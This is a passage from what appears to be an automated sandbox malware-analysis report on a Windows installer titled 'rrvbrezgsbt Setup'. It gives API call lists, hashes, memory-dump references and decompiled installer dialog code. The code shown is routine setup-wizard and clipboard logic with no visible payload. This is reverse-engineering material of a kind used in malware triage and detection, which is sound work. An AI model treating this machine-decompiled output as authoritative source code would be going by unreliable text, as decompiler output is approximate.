SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
DeleteObject.GDI32(?), ref: 0040486F
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
GetWindowLongA.USER32 ref: 004049A9
SetWindowLongA.USER32(?,000000F0,00000000), ref: 004049B7
ShowWindow.USER32(?,00000005), ref: 004049C8
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
ImageList_Destroy.COMCTL32(?), ref: 00404BA4
GlobalFree.KERNEL32 ref: 00404BB4
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
ShowWindow.USER32(?,00000000), ref: 00404D4A
GetDlgItem.USER32 ref: 00404D55
ShowWindow.USER32(00000000), ref: 00404D5C

Strings

M, xrefs: 00404922
, xrefs: 00404D34
N, xrefs: 00404A06

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404F61, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420498;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42366c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423ea8, 8);
							__eflags =  *0x423f2c - _t149; // 0x0
							if(__eflags == 0) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0; // 0x80f8a0
				_t12 = _t123 + 0x5c; // 0x0
				_t13 = _t123 + 0x60; // 0xff00
				_a8 =  *_t12;
				_a12 =  *_t13;
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404f6a
0x00404f70
0x00404f79
0x00404f7c
0x0040510d
0x00405114
0x00405138
0x00405138
0x0040513e
0x0040514b
0x00405169
0x00405169
0x00405170
0x004051c7
0x004051c7
0x004051cb
0x00000000
0x00000000
0x004051cd
0x004051d0
0x00000000
0x00000000
0x004051da
0x004051e0
0x004051e2
0x004051e5
0x004052de
0x00000000
0x004052de
0x004051f4
0x00405200
0x00405206
0x00405209
0x0040520c
0x00405221
0x00405224
0x00405224
0x00405227
0x0040520e
0x00405213
0x00405219
0x0040521c
0x0040521c
0x00405237
0x0040523f
0x00405240
0x00405242
0x0040524b
0x0040524e
0x00405255
0x0040525c
0x00405264
0x00405264
0x00405272
0x00405278
0x0040527b
0x0040527b
0x00405282
0x00405288
0x00405291
0x00405298
0x004052a1
0x004052a3
0x004052a6
0x004052b5
0x004052b7
0x004052bd
0x004052be
0x004052bf
0x004052bf
0x004052c7
0x004052d2
0x004052d8
0x004052d8
0x00000000
0x00405242
0x00405172
0x00405178
0x004051a8
0x004051aa
0x004051b0
0x004051b2
0x004051bb
0x004051bb
0x004051c2
0x00000000
0x004051c2
0x0040517c
0x00405186
0x00000000
0x0040514d
0x0040514d
0x00405153
0x0040518b
0x00000000
0x00405194
0x0040515c
0x00405161
0x00405164
0x00000000
0x00405164
0x0040514b
0x00404f82
0x00404f86
0x00404f8f
0x00404f96
0x00404f99
0x00404f9c
0x00404f9f
0x00404fa0
0x00404fa1
0x00404fb1
0x00404fb4
0x00404fba
0x00404fbd
0x00404fc7
0x00404fd6
0x00404fde
0x00404fe6
0x00404feb
0x00404fee
0x00404ffa
0x00405003
0x0040500c
0x0040502f
0x00405035
0x00405046
0x0040504b
0x00405059
0x00405067
0x00405067
0x0040506c
0x0040507a
0x0040507a
0x0040507f
0x00405082
0x00405087
0x00405093
0x0040509c
0x004050a9
0x004050b8
0x004050ab
0x004050b0
0x004050b0
0x004050c4
0x004050c4
0x004050d8
0x004050e1
0x004050ea
0x004050fa
0x00405106
0x00405106
0x00000000

APIs

GetDlgItem.USER32 ref: 00404FC0
GetDlgItem.USER32 ref: 00404FCF
GetClientRect.USER32 ref: 0040500C
GetSystemMetrics.USER32 ref: 00405014
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
ShowWindow.USER32(?,00000008), ref: 004050B0
GetDlgItem.USER32 ref: 004050D1
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
GetDlgItem.USER32 ref: 00404FDE

Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A

GetDlgItem.USER32 ref: 00405123
CreateThread.KERNEL32 ref: 00405131
CloseHandle.KERNEL32(00000000), ref: 00405138
ShowWindow.USER32(00000000), ref: 0040515C
ShowWindow.USER32(00000000,00000008), ref: 00405161
ShowWindow.USER32(00000008), ref: 004051A8
SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 004051DA
CreatePopupMenu.USER32 ref: 004051EB
AppendMenuA.USER32 ref: 00405200
GetWindowRect.USER32 ref: 00405213
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
OpenClipboard.USER32(00000000), ref: 00405282
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
GlobalLock.KERNEL32 ref: 0040529B
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
SetClipboardData.USER32 ref: 004052D2
CloseClipboard.USER32 ref: 004052D8

Strings

{, xrefs: 004051C7

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00403964, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423ec4; // 0x2
							__eflags =  *0x4091bc - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, "rrvbrezgsbt Setup");
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133) {
							_t142 =  *0x423678 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421498 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x0040396d
0x00403976
0x00403ab7
0x00403abb
0x00403abf
0x00403ac1
0x00403ac6
0x00403ad1
0x00403adc
0x00403ae1
0x00403ae3
0x00403ae5
0x00403ae8
0x00403aed
0x00403afb
0x00403b08
0x00403b0f
0x00403b0f
0x00403b10
0x00403b10
0x00403b15
0x00403b1b
0x00403b22
0x00403b28
0x00403b2a
0x00403b6a
0x00403b6f
0x00403b74
0x00403b74
0x00403b79
0x00403b82
0x00403b84
0x00403b89
0x00403b8f
0x00403b93
0x00403b93
0x00403b98
0x00403b9e
0x00000000
0x00000000
0x00403ba4
0x00403ba9
0x00403baf
0x00000000
0x00000000
0x00403bb8
0x00403bc0
0x00403bc5
0x00403bc8
0x00403bce
0x00403bd3
0x00403bd6
0x00403bdc
0x00403be1
0x00403be4
0x00403bea
0x00403bf2
0x00403bf8
0x00403bfe
0x00403c02
0x00403c09
0x00403c09
0x00403c09
0x00403c13
0x00403c25
0x00403c31
0x00403c36
0x00403c40
0x00403c46
0x00403c48
0x00403c4d
0x00403c4a
0x00403c4a
0x00403c4a
0x00403c5d
0x00403c75
0x00403c77
0x00403c7d
0x00403c92
0x00403c7f
0x00403c88
0x00403c8a
0x00403c8a
0x00403c98
0x00403ca8
0x00403cb9
0x00403cc0
0x00403cc6
0x00403cca
0x00403ccf
0x00403cd1
0x00000000
0x00403cd7
0x00403cd7
0x00403cd9
0x00000000
0x00000000
0x00403cdf
0x00403ce3
0x00403d08
0x00403d0e
0x00403d14
0x00403d16
0x00000000
0x00000000
0x00403d3c
0x00403d42
0x00403d44
0x00403d49
0x00000000
0x00000000
0x00403d4f
0x00403d52
0x00403d55
0x00403d6c
0x00403d78
0x00403d91
0x00403d97
0x00403d9b
0x00403da0
0x00403da6
0x00000000
0x00000000
0x00403db0
0x00403dbb
0x00000000
0x00403dbb
0x00403ce5
0x00403ceb
0x00000000
0x00000000
0x00403cf1
0x00403cf7
0x00000000
0x00000000
0x00000000
0x00403cfd
0x00403cd1
0x00403dc8
0x00403dd4
0x00403ddb
0x00000000
0x00403b2c
0x00403b2c
0x00403b2f
0x00403b62
0x00403b62
0x00403b64
0x00000000
0x00000000
0x00000000
0x00403b64
0x00403b31
0x00403b35
0x00403b3a
0x00403b3c
0x00000000
0x00000000
0x00403b4c
0x00403b54
0x00000000
0x00403b5a
0x00403988
0x00403988
0x0040398c
0x00403991
0x004039a0
0x004039a0
0x004039a9
0x004039b2
0x004039bd
0x004039bd
0x004039c9
0x004039e5
0x004039e8
0x004039fb
0x00403a01
0x00403aa4
0x00000000
0x00403aad
0x00403a07
0x00403a14
0x00403a16
0x00403a18
0x00403a37
0x00403a37
0x00403a3a
0x00403a3f
0x00403a42
0x00403a52
0x00403a53
0x00403a55
0x00403a8b
0x00403a9e
0x00000000
0x00403a9e
0x00403a57
0x00403a5d
0x00403a76
0x00403a7b
0x00403a7d
0x00000000
0x00000000
0x00403a7f
0x00403a6b
0x00403a6b
0x00403a6d
0x00403a6d
0x00000000
0x00403a6d
0x00403a60
0x00403a65
0x00000000
0x00403a65
0x00403a44
0x00403a4a
0x00000000
0x00000000
0x00403a4c
0x00000000
0x00403a4c
0x00403a3c
0x00000000
0x00403a3c
0x00403a22
0x00403a29
0x00403a2f
0x00403a31
0x00000000
0x00000000
0x00000000
0x00403a31
0x004039ed
0x00000000
0x004039cb
0x004039d1
0x004039db
0x00403de1
0x00403de7
0x00403de9
0x00403def
0x00403df4
0x00403dfa
0x00403dfa
0x00403def
0x00403e04
0x00000000
0x00403e04
0x004039c9

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
ShowWindow.USER32(?), ref: 004039BD
DestroyWindow.USER32 ref: 004039D1
SetWindowLongA.USER32(?,00000000,00000000), ref: 004039ED
GetDlgItem.USER32 ref: 00403A0E
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
IsWindowEnabled.USER32(00000000), ref: 00403A29
GetDlgItem.USER32 ref: 00403AD7
GetDlgItem.USER32 ref: 00403AE1
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
GetDlgItem.USER32 ref: 00403BF2
ShowWindow.USER32(00000000,?), ref: 00403C13
EnableWindow.USER32(?,?), ref: 00403C25
EnableWindow.USER32(?,?), ref: 00403C40
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
EnableMenuItem.USER32 ref: 00403C5D
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
lstrlenA.KERNEL32(00420498,?,00420498,rrvbrezgsbt Setup), ref: 00403CB1
SetWindowTextA.USER32(?,00420498), ref: 00403CC0
ShowWindow.USER32(?,0000000A), ref: 00403DF4

Strings

rrvbrezgsbt Setup, xrefs: 00403CA2

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: rrvbrezgsbt Setup
API String ID: 184305955-1271831793
Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F7F, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
